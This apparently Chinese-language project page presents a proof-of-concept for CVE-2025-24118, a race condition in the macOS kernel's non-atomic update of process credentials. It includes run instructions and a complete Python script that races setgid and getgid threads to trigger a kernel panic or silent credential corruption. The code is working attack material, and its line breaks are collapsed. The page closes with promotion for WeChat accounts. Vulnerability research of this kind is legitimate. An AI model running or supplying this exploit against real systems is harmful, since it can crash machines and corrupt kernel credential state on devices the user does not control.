CVE-2025-24118 macOS内核竞态条件漏洞分析与PoC演示

CVE-2025-24118 macOS内核竞态条件漏洞PoC

项目标题与描述

本项目是一个针对 CVE-2025-24118 漏洞的概念验证（Proof of Concept）工具。该漏洞是 macOS 内核中发现的一个竞态条件漏洞，根源在于 kauth_cred_proc_update 函数对进程凭证指针 proc_ro.p_ucred 的更新操作是非原子的。本PoC通过Python脚本模拟了触发该漏洞所需的竞态条件，可用于在受控环境下（如CTF比赛、渗透测试实验室）进行安全研究和漏洞原理学习。

功能特性

• 漏洞模拟：通过创建并发的“写入线程”和“读取线程”，精确复现了导致内核凭证更新不一致的竞态条件场景。
• 简洁易懂：使用Python编写，代码逻辑清晰，便于安全研究人员理解和分析漏洞触发机制。
• 教育用途：适合用于学习macOS内核安全机制、竞态条件漏洞的原理及危害。
• 环境自检：脚本运行前会检查当前进程的真实组ID（GID）和有效组ID（EGID），确保它们不同以符合漏洞触发的前提条件。

安装指南

前提条件

1. 操作系统：需要在 macOS 系统上运行（建议在Intel架构的测试环境中进行）。
2. Python环境：确保系统已安装 Python 3。
3. 权限设置：为了成功触发 setgid 系统调用并切换组ID，运行该PoC的程序（或解释器）需要具有 setgid 权限，或者进程的真实GID与有效GID初始状态不同。

运行步骤

1. 将提供的Python脚本保存为文件，例如 exp.py。
2. 打开终端，导航到脚本所在目录。
3. 直接运行脚本：

   python3 exp.py
   

4. 观察输出。如果进程的真实GID和有效GID相同，脚本会提示错误并退出。如果不同，脚本将启动线程并尝试触发竞态条件。

重要提示：在非授权系统上运行此代码是非法且不道德的。请仅在您拥有完全控制权的实验环境中使用。

使用说明

基础运行

直接执行脚本是最简单的使用方式。脚本会先进行环境检查，然后启动指定数量的线程对来触发竞态条件。

# 直接运行PoC
python3 exp.py

典型场景与输出

在满足漏洞条件（rgid != egid）的环境中运行时，你会看到类似以下输出，然后程序将持续运行，尝试触发内核的不稳定状态（可能最终导致内核恐慌或进程凭证静默损坏）。

Starting 1 thread pairs
rgid: 20
egid: 80

脚本逻辑概述

1. 环境验证：检查并确保进程的真实组ID和有效组ID不同，这是触发 kauth_cred_proc_update 路径的必要条件。
2. 线程创建：创建一对线程（一个“写入者”，一个“读取者”）。
3. 竞态触发：
   • 写入线程 (toggle_cred)：循环调用 os.setgid()，在真实GID和有效GID之间快速切换，模拟对 proc_ro.p_ucred 的写入操作。
   • 读取线程 (reference_cred)：循环调用 os.getgid()，读取当前组ID，模拟对 proc_ro.p_ucred 指针的读取操作。
4. 持续运行：两个线程同时运行，制造非原子更新与并发读取之间的时间窗口，从而触发漏洞。

核心代码

以下是PoC脚本的核心代码及其详细注释。

import os
import threading
import sys
import time# 定义线程数，与原C代码保持一致，设置为1对线程即可触发
NUM_THREADS = 1# 获取当前进程的真实组ID和有效组ID
rg = os.getgid()
eg = os.getegid()def toggle_cred():"""写入线程函数。持续在真实GID(rg)和有效GID(eg)之间切换。每次调用 os.setgid() 都会尝试更新内核中的进程凭证结构 (proc_ro.p_ucred)。这个非原子的更新操作是CVE-2025-24118漏洞的根源。"""while True:# 调用setgid写入 proc_ro.p_ucredos.setgid(rg)os.setgid(eg)def reference_cred():"""读取线程函数。持续读取当前的组ID。调用 os.getgid() 会读取内核中的 proc_ro.p_ucred 指针。当此读取与上面的 toggle_cred 写入同时发生时，可能读到不一致的指针值。"""while True:# 调用getgid读取 proc_ro.p_ucredtmp = os.getgid()def main():"""主函数。检查运行条件，初始化并启动竞态线程。"""# 漏洞触发要求真实GID和有效GID不同，以进入kauth_cred_proc_update代码路径if rg == eg:print(f"Real and effective groups are the same ({rg}), they need to be different to trigger kauth_cred_proc_update")sys.exit(1)print(f"Starting {NUM_THREADS} thread pairs")print(f"rgid: {rg}\negid: {eg}")pool = []# 创建指定数量的读写线程对for i in range(NUM_THREADS):t1 = threading.Thread(target=toggle_cred)t2 = threading.Thread(target=reference_cred)pool.append(t1)pool.append(t2)t1.start()t2.start()# 等待所有线程结束（实际上，由于是无限循环，它们不会自行结束）for t in pool:t.join()print("Done")if __name__ == "__main__":main()

6HFtX5dABrKlqXeO5PUv/wpIm2IPnqJCrU03p74jAYw=
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

公众号二维码